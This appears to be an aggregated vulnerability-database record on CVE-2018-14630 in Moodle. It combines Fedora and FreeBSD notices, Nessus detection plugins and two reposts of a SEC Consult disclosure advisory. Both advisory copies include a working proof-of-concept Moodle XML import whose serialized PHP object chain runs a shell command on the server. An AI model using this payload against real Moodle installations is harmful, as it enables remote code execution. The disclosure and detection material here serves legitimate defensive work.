["CVE-2018-14630"], "description": "Moodle is a course management system (CMS) - a free, Open Source software package designed using sound pedagogical principles, to help educators crea te effective online learning communities. ", "modified": "2018-09-27T02:36:13", "published": "2018-09-27T02:36:13", "id": "FEDORA:EFB656087D8D", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 28 Update: moodle-3.4.5-1.fc28", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:55", "bulletinFamily": "unix", "cvelist": ["CVE-2018-14630"], "description": "Moodle is a course management system (CMS) - a free, Open Source software package designed using sound pedagogical principles, to help educators crea te effective online learning communities. ", "modified": "2018-09-26T20:18:36", "published": "2018-09-26T20:18:36", "id": "FEDORA:0B2626057155", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 27 Update: moodle-3.3.8-1.fc27", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2021-01-07T10:18:39", "description": "Fix for CVE-2018-14630\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 14, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-01-03T00:00:00", "title": "Fedora 28 : moodle (2018-690535d30b)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-14630"], "modified": "2019-01-03T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:moodle", "cpe:/o:fedoraproject:fedora:28"], "id": "FEDORA_2018-690535D30B.NASL", "href": "https://www.tenable.com/plugins/nessus/120492", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-690535d30b.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(120492);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2018-14630\");\n script_xref(name:\"FEDORA\", value:\"2018-690535d30b\");\n\n script_name(english:\"Fedora 28 : moodle (2018-690535d30b)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Fix for CVE-2018-14630\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-690535d30b\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected moodle package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:moodle\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:28\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/09/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/09/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^28([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 28\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC28\", reference:\"moodle-3.4.5-1.fc28\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"moodle\");\n}\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T10:19:09", "description": "Fix for CVE-2018-14630\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 14, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-01-03T00:00:00", "title": "Fedora 29 : moodle (2018-84a5340cc9)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-14630"], "modified": "2019-01-03T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:29", "p-cpe:/a:fedoraproject:fedora:moodle"], "id": "FEDORA_2018-84A5340CC9.NASL", "href": "https://www.tenable.com/plugins/nessus/120581", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-84a5340cc9.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(120581);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2018-14630\");\n script_xref(name:\"FEDORA\", value:\"2018-84a5340cc9\");\n\n script_name(english:\"Fedora 29 : moodle (2018-84a5340cc9)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Fix for CVE-2018-14630\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-84a5340cc9\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected moodle package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:moodle\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:29\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/09/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/09/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^29([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 29\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC29\", reference:\"moodle-3.5.2-1.fc29\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"moodle\");\n}\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-02-01T02:45:27", "description": "moodle reports :\n\nMoodle XML import of ddwtos could lead to intentional remote code\nexecution\n\nQuickForm library remote code vulnerability (upstream)\n\nBoost theme - blog search GET parameter insufficiently filtered", "edition": 23, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-09-19T00:00:00", "title": "FreeBSD : moodle -- multiple vulnerabilities (074cb225-bb2d-11e8-90e1-fcaa147e860e)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-14630", "CVE-2018-14631", "CVE-2018-1999022"], "modified": "2021-02-02T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:moodle34", "p-cpe:/a:freebsd:freebsd:moodle33", "cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:moodle31", "p-cpe:/a:freebsd:freebsd:moodle35"], "id": "FREEBSD_PKG_074CB225BB2D11E890E1FCAA147E860E.NASL", "href": "https://www.tenable.com/plugins/nessus/117594", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(117594);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/04/05 23:25:06\");\n\n script_cve_id(\"CVE-2018-14630\", \"CVE-2018-14631\", \"CVE-2018-1999022\");\n\n script_name(english:\"FreeBSD : moodle -- multiple vulnerabilities (074cb225-bb2d-11e8-90e1-fcaa147e860e)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"moodle reports :\n\nMoodle XML import of ddwtos could lead to intentional remote code\nexecution\n\nQuickForm library remote code vulnerability (upstream)\n\nBoost theme - blog search GET parameter insufficiently filtered\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://moodle.org/mod/forum/discuss.php?d=376023\"\n );\n # https://vuxml.freebsd.org/freebsd/074cb225-bb2d-11e8-90e1-fcaa147e860e.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b1a34a67\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:moodle31\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:moodle33\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:moodle34\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:moodle35\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/09/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/09/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/09/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"moodle31<3.1.14\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"moodle33<3.3.8\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"moodle34<3.4.5\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"moodle35<3.5.2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2018-09-19T23:39:07", "description": "Exploit for php platform in category web applications", "edition": 1, "published": "2018-09-19T00:00:00", "title": "Moodle 3.x PHP Unserialize Remote Code Execution Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-14630"], "modified": "2018-09-19T00:00:00", "id": "1337DAY-ID-31126", "href": "https://0day.today/exploit/description/31126", "sourceData": "=======================================================================\r\n title: Remote Code Execution via PHP unserialize\r\n product: Moodle - Open-source learning platform\r\n vulnerable version: 3.5 to 3.5.1, 3.4 to 3.4.4, 3.1 to 3.1.13 and\r\n earlier unsupported versions\r\n fixed version: 3.5.2, 3.4.5, 3.3.8 and 3.1.14\r\n CVE number: CVE-2018-14630\r\n impact: critical\r\n homepage: https://moodle.org/\r\n\r\n=======================================================================\r\n\r\nVendor description:\r\n-------------------\r\n\"Moodle is a learning platform designed to provide educators, administrators\r\nand learners with a single robust, secure and integrated system to create\r\npersonalised learning environments. Powering tens of thousands of learning\r\nenvironments globally, Moodle is trusted by institutions and organisations\r\nlarge and small, including Shell, London School of Economics,\r\nState University of New York, Microsoft and the Open University. Moodleas\r\nworldwide numbers of more than 90 million users across both academic and\r\nenterprise level usage makes it the worldas most widely used learning platform.\"\r\n\r\nSource: https://moodle.org/about\r\n\r\n\r\nBusiness recommendation:\r\n------------------------\r\nThe vendor provides a patch which should be installed immediately.\r\n\r\nSEC Consult recommends to perform a thorough security review conducted by\r\nsecurity professionals to identify and resolve all security issues.\r\n\r\n\r\nVulnerability overview/description:\r\n-----------------------------------\r\n1) Remote Code Execution via PHP unserialize (CVE-2018-14630)\r\nWhen importing a \"drag and drop into text\" (ddwtos) question in the legacy\r\nMoodle XML format, the passed feedback answer is used unsanitized in an\r\nunserialize() function, which leads to a PHP Object Injection vulnerability.\r\nBy providing a sophisticated PHP Object chain it is possible to leverage the\r\nPOI into a fully-blown arbitrary Remote Code Execution (RCE).\r\n\r\nTo exploit this vulnerability an attacker needs permissions to create a quiz\r\nor at least be able to import questions. A user of the role teacher usually has\r\nthese permissions. However, students can also be assigned to the role teacher for\r\na specific course.\r\n\r\n\r\nProof of concept:\r\n-----------------\r\n1) Remote Code Execution via PHP unserialize (CVE-2018-14630)\r\nIn order to exploit this issue an attacker has to open Moodle's question bank\r\nfor a specific course and import the following Moodle XML file. The answer\r\nfeedback contains a sophisticated PHP object chain which only contains objects\r\nfrom Moodles library. After the parsing process the command \"echo `whoami`\" is\r\nbeing executed.\r\n\r\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n<quiz>\r\n <question type=\"ddwtos\">\r\n <name>\r\n <text>question name</text>\r\n </name>\r\n <questiontext format=\"html\">\r\n <text><![CDATA[<p>How is the weather?<br></p>]]></text>\r\n </questiontext>\r\n <answer fraction=\"100\">\r\n <feedback format=\"html\">\r\n <text>\r\n\r\nO:15:\"\\\\core\\\\lock\\\\lock\":2:{s:3:\"key\";O:23:\"\\\\core_availability\\\\tree\":1:{s:8:\"children\";O:24:\"\\\\core\\\\dml\\\\recordset_walk\":2:{s:8:\"callback\";s:6:\"system\";s:9:\"recordset\";O:25:\"question_attempt_iterator\":2:\r\n\r\n{s:4:\"quba\";O:26:\"question_usage_by_activity\":1:{s:16:\"questionattempts\";a:1:{s:4:\"1337\";s:13:\"echo\r\n`whoami`\";}}s:5:\"slots\";a:1:{i:0;i:1337;}}}}s:8:\"infinite\";i:1;}\r\n </text>\r\n </feedback>\r\n </answer>\r\n </question>\r\n</quiz>\r\n\r\n\r\nVulnerable / tested versions:\r\n-----------------------------\r\nThe following version has been tested which was the most recent one at the\r\ntime of the test:\r\n\r\n* 3.5.1+\r\n\r\nAccording to the vendor, all previous versions are affected as well:\r\n* 3.5 to 3.5.1, 3.4 to 3.4.4, 3.1 to 3.1.13 and earlier unsupported versions\r\n\r\n\r\nVendor contact timeline:\r\n------------------------\r\n2018-07-08: Vulnerability identified, further analysis (credits to Robin Peraglie\r\n from RIPS Technologies)\r\n2018-07-09: Contacting vendor through tracker.moodle.org (issue [MDL-62880]\r\n created)\r\n2018-07-09: Vendor replied and supplied a fix for the vulnerability\r\n2018-09-10: Vendor releases patched version\r\n2018-09-18: Public release of security advisory\r\n\r\n\r\nSolution:\r\n---------\r\nThe vendor provides a patched version (3.5.2) which should be installed immediately:\r\nhttps://download.moodle.org/releases/latest/\r\n\r\nThe vendor also provided a security advisory regarding this issue:\r\nhttps://moodle.org/mod/forum/discuss.php?d=376023#p1516118\r\n\r\n\r\nWorkaround:\r\n-----------\r\nDisable import of ddwtos questions through XML files.\n\n# 0day.today [2018-09-19] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/31126"}], "packetstorm": [{"lastseen": "2018-09-19T10:10:10", "description": "", "published": "2018-09-19T00:00:00", "type": "packetstorm", "title": "Moodle 3.x PHP Unserialize Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-14630"], "modified": "2018-09-19T00:00:00", "id": "PACKETSTORM:149426", "href": "https://packetstormsecurity.com/files/149426/Moodle-3.x-PHP-Unserialize-Remote-Code-Execution.html", "sourceData": "`SEC Consult Vulnerability Lab Security Advisory < 20180918-0 > \n======================================================================= \ntitle: Remote Code Execution via PHP unserialize \nproduct: Moodle - Open-source learning platform \nvulnerable version: 3.5 to 3.5.1, 3.4 to 3.4.4, 3.1 to 3.1.13 and \nearlier unsupported versions \nfixed version: 3.5.2, 3.4.5, 3.3.8 and 3.1.14 \nCVE number: CVE-2018-14630 \nimpact: critical \nhomepage: https://moodle.org/ \nfound: 2018-07-08 \nby: Johannes Moritz (Office Berlin) \nSEC Consult Vulnerability Lab \n \nAn integrated part of SEC Consult \nEurope | Asia | North America \n \nhttps://www.sec-consult.com \n \n======================================================================= \n \nVendor description: \n------------------- \n\"Moodle is a learning platform designed to provide educators, administrators \nand learners with a single robust, secure and integrated system to create \npersonalised learning environments. Powering tens of thousands of learning \nenvironments globally, Moodle is trusted by institutions and organisations \nlarge and small, including Shell, London School of Economics, \nState University of New York, Microsoft and the Open University. Moodleas \nworldwide numbers of more than 90 million users across both academic and \nenterprise level usage makes it the worldas most widely used learning platform.\" \n \nSource: https://moodle.org/about \n \n \nBusiness recommendation: \n------------------------ \nThe vendor provides a patch which should be installed immediately. \n \nSEC Consult recommends to perform a thorough security review conducted by \nsecurity professionals to identify and resolve all security issues. \n \n \nVulnerability overview/description: \n----------------------------------- \n1) Remote Code Execution via PHP unserialize (CVE-2018-14630) \nWhen importing a \"drag and drop into text\" (ddwtos) question in the legacy \nMoodle XML format, the passed feedback answer is used unsanitized in an \nunserialize() function, which leads to a PHP Object Injection vulnerability. \nBy providing a sophisticated PHP Object chain it is possible to leverage the \nPOI into a fully-blown arbitrary Remote Code Execution (RCE). \n \nTo exploit this vulnerability an attacker needs permissions to create a quiz \nor at least be able to import questions. A user of the role teacher usually has \nthese permissions. However, students can also be assigned to the role teacher for \na specific course. \n \n \nProof of concept: \n----------------- \n1) Remote Code Execution via PHP unserialize (CVE-2018-14630) \nIn order to exploit this issue an attacker has to open Moodle's question bank \nfor a specific course and import the following Moodle XML file. The answer \nfeedback contains a sophisticated PHP object chain which only contains objects \nfrom Moodles library. After the parsing process the command \"echo `whoami`\" is \nbeing executed. \n \n<?xml version=\"1.0\" encoding=\"UTF-8\"?> \n<quiz> \n<question type=\"ddwtos\"> \n<name> \n<text>question name</text> \n</name> \n<questiontext format=\"html\"> \n<text><![CDATA[<p>How is the weather?<br></p>]]></text> \n</questiontext> \n<answer fraction=\"100\"> \n<feedback format=\"html\"> \n<text> \n \nO:15:\"\\\\core\\\\lock\\\\lock\":2:{s:3:\"key\";O:23:\"\\\\core_availability\\\\tree\":1:{s:8:\"children\";O:24:\"\\\\core\\\\dml\\\\recordset_walk\":2:{s:8:\"callback\";s:6:\"system\";s:9:\"recordset\";O:25:\"question_attempt_iterator\":2: \n \n{s:4:\"quba\";O:26:\"question_usage_by_activity\":1:{s:16:\"questionattempts\";a:1:{s:4:\"1337\";s:13:\"echo \n`whoami`\";}}s:5:\"slots\";a:1:{i:0;i:1337;}}}}s:8:\"infinite\";i:1;} \n</text> \n</feedback> \n</answer> \n</question> \n</quiz> \n \n \nVulnerable / tested versions: \n----------------------------- \nThe following version has been tested which was the most recent one at the \ntime of the test: \n \n* 3.5.1+ \n \nAccording to the vendor, all previous versions are affected as well: \n* 3.5 to 3.5.1, 3.4 to 3.4.4, 3.1 to 3.1.13 and earlier unsupported versions \n \n \nVendor contact timeline: \n------------------------ \n2018-07-08: Vulnerability identified, further analysis (credits to Robin Peraglie \nfrom RIPS Technologies) \n2018-07-09: Contacting vendor through tracker.moodle.org (issue [MDL-62880] \ncreated) \n2018-07-09: Vendor replied and supplied a fix for the vulnerability \n2018-09-10: Vendor releases patched version \n2018-09-18: Public release of security advisory \n \n \nSolution: \n--------- \nThe vendor provides a patched version (3.5.2) which should be installed immediately: \nhttps://download.moodle.org/releases/latest/ \n \nThe vendor also provided a security advisory regarding this issue: \nhttps://moodle.org/mod/forum/discuss.php?d=376023#p1516118 \n \n \nWorkaround: \n----------- \nDisable import of ddwtos questions through XML files. \n \n \nAdvisory URL: \n------------- \nhttps://www.sec-consult.com/en/vulnerability-lab/advisories/index.html \n \n \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n \nSEC Consult Vulnerability Lab \n \nSEC Consult \nEurope | Asia | North America \n \nAbout SEC Consult Vulnerability Lab \nThe SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It \nensures the continued knowledge gain of SEC Consult in the field of network \nand application security to stay ahead of the attacker. The SEC Consult \nVulnerability Lab supports high-quality penetration testing and the evaluation \nof new offensive and defensive technologies for our customers. Hence our \ncustomers obtain the most current information about vulnerabilities and valid \nrecommendation about the risk profile of new technologies. \n \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \nInterested to work with the experts of SEC Consult? \nSend us your application https://www.sec-consult.com/en/career/index.html \n \nInterested in improving your cyber security with the experts of SEC Consult? \nContact our local offices https://www.sec-consult.com/en/contact/index.html \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n \nMail: research at sec-consult dot com \nWeb: https://www.sec-consult.com \nBlog: http://blog.sec-consult.com \nTwitter: https://twitter.com/sec_consult \n \nEOF J. Moritz / @2018 \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/149426/SA-20180918-0.txt"}], "freebsd": [{"lastseen": "2019-05-29T18:31:51", "bulletinFamily": "unix", "cvelist": ["CVE-2018-14630", "CVE-2018-14631", "CVE-2018-1999022"], "description": "\nmoodle reports:\n\nMoodle XML import of ddwtos could lead to intentional remote code\n\t execution\nQuickForm library remote code vulnerability (upstream)\nBoost theme - blog search GET parameter insufficiently filtered\n\n", "edition": 3, "modified": "2018-09-05T00:00:00", "published": "2018-09-05T00:00:00", "id": "074CB225-BB2D-11E8-90E1-FCAA147E860E", "href": "https://vuxml.freebsd.org/freebsd/074cb225-bb2d-11e8-90e1-fcaa147e860e.html", "title": "moodle -- multiple vulnerabilities", "type": "freebsd", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}
